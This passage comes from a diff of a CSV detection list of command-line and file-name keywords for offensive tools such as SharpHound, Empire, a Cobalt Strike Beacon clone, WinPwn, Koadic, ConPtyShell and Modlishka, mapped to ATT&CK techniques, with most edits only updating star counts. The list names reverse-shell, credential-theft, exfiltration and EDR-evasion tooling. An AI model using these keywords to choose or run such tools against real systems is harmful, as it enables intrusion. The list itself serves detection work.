Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SPN.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* --collectionmethods ACL*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods ComputerOnly*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods Container*","offensive_tool_keyword","sharphound","C# Data Collector for 
BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods DCOM","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods DCOnly*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods GPOLocalGroup*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods Group*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods LocalGroup*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods LoggedOn*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods ObjectProps*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods PSRemote*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods RDP*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods Session*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --collectionmethods Trusts*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* com.blackh4t*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"* --collectallproperties*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --CollectionMethod All *ldap*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --CollectionMethod All *--ZipFileName *.zip*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* -CollectionMethod 
All*loggedon*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"* -CollectionMethod LoggedOn -Verbose*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"* -CollectionMethod stealth*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SPN.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --collectionmethods ACL*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods ComputerOnly*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods Container*","offensive_tool_keyword","sharphound","C# Data Collector for 
BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods DCOM","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods DCOnly*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods GPOLocalGroup*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods Group*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods LocalGroup*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods LoggedOn*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods ObjectProps*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods PSRemote*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods RDP*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods Session*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods Trusts*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* com.blackh4t*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "* --command * --output payload*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" -"* -command *.exe* -technique ccmstp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"* common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -command *.exe* -technique ccmstp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"* common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "* ComputerDefaults.exe*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"* -ComputerName -ServiceEXE *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PsExec.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"* -config modlishka.json *","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. 
over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","0","N/A","5","10","4434","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" -"* Configuring Windows Firewall rules to block EDR network access*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"* ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" -"* -consoleoutput -browsercredentials*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"* -consoleoutput -DomainRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"* -consoleoutput -Localrecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows 
Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"* -ConType bind *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Vnc.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -ConType reverse *","offensive_tool_keyword","empire","Empire scripts 
functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Vnc.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -ComputerName -ServiceEXE *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"* -config modlishka.json *","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
